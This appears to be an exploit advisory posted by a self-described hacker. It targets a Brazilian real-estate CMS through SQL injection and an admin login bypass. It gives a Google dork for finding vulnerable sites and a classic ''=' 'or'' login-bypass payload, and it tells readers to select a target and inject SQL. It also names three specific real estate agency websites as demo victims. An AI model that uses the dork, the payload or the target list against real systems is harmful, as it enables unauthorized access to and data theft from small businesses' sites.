facebook facebook twitter rss

Brazil cms SQL Injection and admin Bypas Vulnerability

Author: Rednofozi , Published: 13-10-2018
|[+] Exploit Title: Brazil cms SQL Injection and admin Bypas Vulnerability
|[+] Date:12/10/2018
[+] Category: Webapps
|[+] Exploit Author : Rednofozi
|[+] Tested on: : Windows 10 , parrot os
|[+] Google Dork: inurl:detalhes_imovel.php?Cod= site:br'
|[+] Vendor Homepage : www.hamilimoveis.com.br
|[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243
|[+] MY page https://cxsecurity.com/author/Inj3ct0r
|[+] MY page http://www.exploit4arab.org/author/308/Rednofozi
|[+] MY site :anonysec.org
|[+] ME:Rednfozi@yahoo.com
|[+] ME:Rednofozi@hotmail.com
|[+] ME:inj3ct0r@tuta.io
|--------------------------------------------------------------|
|[+] anonysec Hacker
****************************************************************|
|[+] Exploit Info :
# {INFO}

# Page Admin :

site.br/adm

Bypass

User & Pass :

'=' 'or'

|--------------------------------------------------------------|
|[+]
|[+] Demo: admin by pass and injection Vulnerability-
:

[+] search the google dork ==> intext :inurl:detalhes_imovel.php?Cod= site:br'

[+] select a target

[+] inject sql codes

# {DEMO}

# 01: http://www.ubatubaceliolocacoes.com/detalhes_imovel.php?Cod=41

# 02: http://www.imoveismanduri.com.br/detalhes_imovel.php?Cod=71

# 03: http://www.hamilimoveis.com.br/detalhes_imovel.php?Cod=137

# 04: admin bypass and SQL Injection

Like us on Facebook :